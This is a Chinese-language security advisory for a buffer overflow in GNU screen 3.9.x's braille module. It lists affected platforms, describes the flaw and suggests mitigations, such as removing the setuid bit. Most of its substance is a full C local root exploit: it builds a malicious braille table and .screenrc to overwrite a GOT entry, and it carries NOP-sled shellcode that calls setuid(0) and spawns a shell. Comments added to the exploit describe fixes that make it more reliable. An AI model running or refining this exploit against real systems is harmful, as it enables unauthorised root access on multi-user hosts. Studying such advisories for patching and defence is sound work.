GNU Screen Braille Module存在缓冲溢出漏洞 发布时间:2002-04-26 更新时间:2002-04-26 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式
BUGTRAQ ID:4578
受影响系统GNU screen 3.9.4
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.8
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.9
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.10
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.11
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86 详细描述 Screen 是免费、开放源代码的终端管理软件,可在多种系统平台下使用。
在某些环境下,本地用户可利用 screen 中的缓冲区溢出提升权限。问题在于 screen 的 braille module 对输入数据的边界检查不充分:本地用户向 screen 提供超长或越界的数据(例如通过自定义 .screenrc 中 bd_braille_table 指定的 braille table 文件),可导致缓冲区溢出。从下面的测试代码来看,其利用方式是在 braille table 文件中写入带有负值(越界)索引的表项,从而覆盖 screen 进程中的 GOT 表项并劫持控制流;要由此获得 root 权限,通常还要求 screen 以 setuid root 方式安装并在编译时启用了 braille 支持,具体以实际环境为准。
测试代码 /*
screen 3.9.11 local root exploit for braille module
dedicated to the $ecurity Community, where blind leading blind.
code for: linux/x86
to use:
1) edit paths in #defines
2) gcc -o GOBBLES-own-screen GOBBLES-own-screen.c
3) ./GOBBLES-own-screen -p
4) ./GOBBLES-own-screen -f
5) ./GOBBLES-own-screen -a 0xGOBBLES
if you want rootshell, that up to you to modify exploit.
beware vicious remote root exploit coming from GOBBLES for Sun Solaris
version 6-8, hurry up Sun to make patch. . .
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NULLBASE 48
#define TABLE "/home/GOBBLES/hacking/.scrx"
#define SCREENRC "/home/GOBBLES/hacking/.screenrc"
#define SCREEN "/home/GOBBLES/hacking/current/screen-3.9.11/screen"
#define FIND 1
#define PUT 0
#define OFFSET -40300
#define SHELL "/bin/bash"
#define NOP 0x90
void bta(int byte, char *store);
void stuff(int que);
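/*
 * Return the current stack pointer.  stuff(FIND) uses it as the starting
 * point for scanning upwards through this process's stack/environment for
 * the NOP sled planted by stuff(PUT).
 *
 * The original version had no return statement and relied on whatever the
 * asm left in %eax being used as the return value; falling off the end of a
 * non-void function is undefined behaviour and breaks under optimisation.
 * An explicit output operand plus a real return fixes that.
 *
 * x86 only (the exploit targets linux/x86).  On x86-64 this yields the low
 * 32 bits of %rsp, which is all the 32-bit target needs.
 */
unsigned long get_sp(void)
{
    unsigned int sp;

    __asm__ __volatile__ ("movl %%esp, %0" : "=r" (sp));
    return (unsigned long)sp;
}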
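/*
 * Entry point.
 *
 * Modes (see the usage text below):
 *   -p  stuff(PUT): put NOP sled + shellcode into the environment and drop
 *       into a shell;
 *   -f  stuff(FIND): print where that sled landed;
 *   otherwise run the exploit: -a gives the shellcode address, -o the table
 *       index to start writing at (defaults to OFFSET, which is negative --
 *       i.e. an out-of-range braille-table index; the usage text calls it
 *       the "offset to GOT address").
 *
 * The exploit path splits the address into four bytes (least significant
 * first), encodes each with bta() as a braille-table entry at index
 * start+i, writes the table and a .screenrc that loads it, and exec's
 * screen with that .screenrc.
 *
 * Fixes over the original: the getopt() result was stored in a char and
 * compared with EOF (never terminates where char is unsigned); address was
 * read uninitialised when -a was absent; -a/-o values are now parsed with
 * strtoul/strtol and rejected when malformed; fclose() of the written files
 * is checked; the .screenrc line is written directly instead of via a
 * 64-byte buffer that silently truncated long TABLE paths; execl()'s
 * terminating NULL is cast to a pointer as a variadic argument requires;
 * unused locals dropped.
 *
 * Returns: does not return on success (process image replaced by screen);
 * exits 1 on any failure, 0 after -p/-f or usage.
 */
int
main(int argc, char **argv)
{
    char buf[64], store[10], *end;
    unsigned long address = 0;
    unsigned int w[4];
    int i, c, start, have_addr = 0;
    FILE *fd;

    if (argc == 1) {
        fprintf(stderr, "\n%s [ -p ] [ -f ] [ -a <shellcode address> -o <offset to GOT address> ]\n\n", argv[0]);
        fprintf(stderr, "-p switch places shellcode into memory\n");
        fprintf(stderr, "-f switch finds shellcode address\n\n");
        fprintf(stderr, "No switch runs exploit with options:\n");
        fprintf(stderr, "\t-a <shellcode address>\n");
        fprintf(stderr, "\t-o <offset to GOT address>\n\n");
        exit(0);
    }

    start = OFFSET;
    /* getopt() returns int; its -1 end marker must be compared as int. */
    while ((c = getopt(argc, argv, "pfa:o:")) != -1) {
        switch (c) {
        case 'p':
            stuff(PUT);
            exit(0);
        case 'f':
            stuff(FIND);
            exit(0);
        case 'a':
            /* hex with optional 0x prefix (what "%p" accepted), now checked */
            address = strtoul(optarg, &end, 16);
            if (end == optarg || *end != '\0') {
                fprintf(stderr, ". bad shellcode address: %s\n", optarg);
                exit(1);
            }
            have_addr = 1;
            break;
        case 'o':
            start = (int)strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0') {
                fprintf(stderr, ". bad offset: %s\n", optarg);
                exit(1);
            }
            break;
        default:
            fprintf(stderr, "hehehehe?\n");
            exit(0);
        }
    }
    if (!have_addr) {
        fprintf(stderr, ". no shellcode address given (-a); run -p, then -f, first\n");
        exit(1);
    }

    fprintf(stderr, ". preparing evil braille table\n");
    if ((fd = fopen(TABLE, "w")) == NULL) {
        perror("fopen");
        exit(1);
    }
    fprintf(stderr, ". converting: 0x%lx into braille table strings\n", address);
    /* little-endian: w[0] is the least significant byte of the address */
    for (i = 0; i < 4; i++)
        w[i] = (unsigned int)((address >> (8 * i)) & 0xff);
    for (i = 0; i < 4; i++) {
        /* bta() historically expected a buffer pre-filled with 'o' */
        memset(store, 'o', 9);
        bta((int)w[i], store);
        snprintf(buf, sizeof(buf), "%d ff %s\n", start + i, store);
        fprintf(stderr, ". writing to braille table: %s", buf);
        fputs(buf, fd);
    }
    /* write stream: fclose() flushes, so its result matters */
    if (fclose(fd) != 0) {
        perror("fclose");
        exit(1);
    }

    fprintf(stderr, ". preparing evil .screenrc\n");
    if ((fd = fopen(SCREENRC, "w")) == NULL) {
        perror("fopen");
        exit(1);
    }
    fprintf(fd, "bd_start_braille on\n");
    fprintf(fd, "bd_braille_table %s\n", TABLE);
    fprintf(fd, "bd_type powerbraille_40\n");
    fprintf(fd, "bd_port /dev/ttyS0\n");
    if (fclose(fd) != 0) {
        perror("fclose");
        exit(1);
    }

    fprintf(stderr, ". now exploiting blind, hehehe\n");
    /* execl() only returns on failure; the argv terminator must be a pointer */
    execl(SCREEN, "screen", "-c", SCREENRC, (char *)NULL);
    fprintf(stderr, ". error executing\n");
    exit(1);
}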
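/*
 * Encode one byte as a 9-character braille-table cell string.
 *
 * byte:  value to encode; only its low 8 bits are used.
 * store: output buffer of at least 10 bytes; receives the 9 characters plus
 *        a NUL terminator.
 *
 * Character i (i = 1..8) of the result is NULLBASE+i when bit i-1 of the
 * byte is set, otherwise NULLBASE.  Character 0 has weight 0 in the
 * original's table and therefore always comes out as NULLBASE; it carries
 * no data but is kept for format compatibility.  With NULLBASE == 48 ('0')
 * this means 0x41 -> "010000070", 0xff -> "012345678".
 *
 * The original derived the output from marker characters it wrote into
 * store, so it silently mis-encoded any 'x' already present in the buffer
 * and relied on the caller pre-filling it with 'o'.  The encoding is now
 * computed straight from the bit pattern and store's prior contents are
 * irrelevant.  Also echoes the result to stderr, as before.
 */
void
bta(int byte, char *store)
{
    unsigned int v = (unsigned int)byte & 0xffu;
    int i;

    store[0] = NULLBASE;                   /* weight 0: never a set bit */
    for (i = 1; i < 9; i++) {
        if (v & (1u << (i - 1)))
            store[i] = (char)(NULLBASE + i);
        else
            store[i] = NULLBASE;
    }
    store[9] = '\0';
    fprintf(stderr, ". braille table string for byte: 0x%x is: %s\n", byte, store);
}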
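/*
 * Shellcode placement (que == PUT) and lookup (que == FIND).
 *
 * PUT:  build a 4096-byte buffer consisting of a NOP sled with the
 *       shellcode at its very end, export it as the environment variable
 *       CODE and spawn SHELL so the user can run the -f and exploit steps
 *       from a process that inherits CODE.  system(SHELL) is intentional
 *       here (interactive shell, compile-time path, no user input).
 * FIND: starting at the current stack pointer, walk upwards until twelve
 *       consecutive NOP bytes are found and print that address (+1) as the
 *       value to pass to -a.  The scan is unbounded by design: if CODE is
 *       not in this process's environment (i.e. -p was not run first, or -f
 *       was run from a different shell) it will run off the top of the
 *       stack and fault instead of reporting failure.
 *
 * The shellcode is linux/x86 int 0x80 code: it appears to call
 * setuid(0) (eax=23, ebx=0) and then execve "/bin/sh" "-c" <command>,
 * patching the two '0' placeholders after "/bin/sh" and "-c" to NUL at
 * run time (the two byte stores at offsets 0x17 and 0x1a) -- decoded from
 * the bytes, not documented by the author.
 *
 * Fixes over the original: the found address was passed to "%lx" as a
 * char* (format/argument mismatch, undefined behaviour); the unreachable
 * "trouble locating shellcode" branch (the loop only exits on a match) is
 * gone; the redundant double memset is collapsed.
 */
void
stuff(int que)
{
    char *p, codebuf[4097], code[] =
        // borrowed shellcode, GOBBLES lazy today,
        // not sure who to credit for it, if it
        // yours please email GOBBLES@hushmail.com
        // to be acknowledged!
        "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
        "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
        "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
        "\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
        "\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
        "\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
        "\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
        "\x30"
        // hehehe..hoping blind not deaf so he can hear beep, hehehe.
        "echo \"Hope you not really blind, because you now owned by unethical penetrator using ethical GOBBLES exploit, hehehehe ;Pppppp\" | wall";
        // also let user on shell provider know system comprimised, hehe.
    const char *locate = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    size_t codelen, loclen;

    if (que == PUT) {
        /* NOP sled over the whole buffer, shellcode at the end, NUL last */
        codelen = strlen(code);
        memset(codebuf, NOP, sizeof(codebuf) - 1);
        codebuf[sizeof(codebuf) - 1] = '\0';
        memcpy(codebuf + (sizeof(codebuf) - codelen - 1), code, codelen);
        fprintf(stderr, ". run GOBBLES-own-screen -f\n");
        if (setenv("CODE", codebuf, 1) == -1) {
            fprintf(stderr, ". no mem for shellcode\n");
            return;
        }
        system(SHELL);
    } else if (que == FIND) {
        fprintf(stderr, ". getting address\n");
        loclen = strlen(locate);
        p = (char *)get_sp();
        /* first run of loclen NOPs above the stack pointer */
        while (memcmp(p, locate, loclen) != 0)
            p++;
        fprintf(stderr, ". shellcode found at: 0x%lx\n", (unsigned long)(p + 1));
    }
}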
解决方案 尚无(截至本通告发布时厂商尚未提供补丁)。在补丁可用之前,可根据环境评估以下缓解措施:去掉 screen 可执行文件的 setuid root 位(会影响依赖该权限的功能,如多用户会话),或重新编译 screen 时不启用 braille 支持以移除存在问题的模块。
相关信息 参考:http://www.bugtraq.org/advisories/GOBBLES-33.txt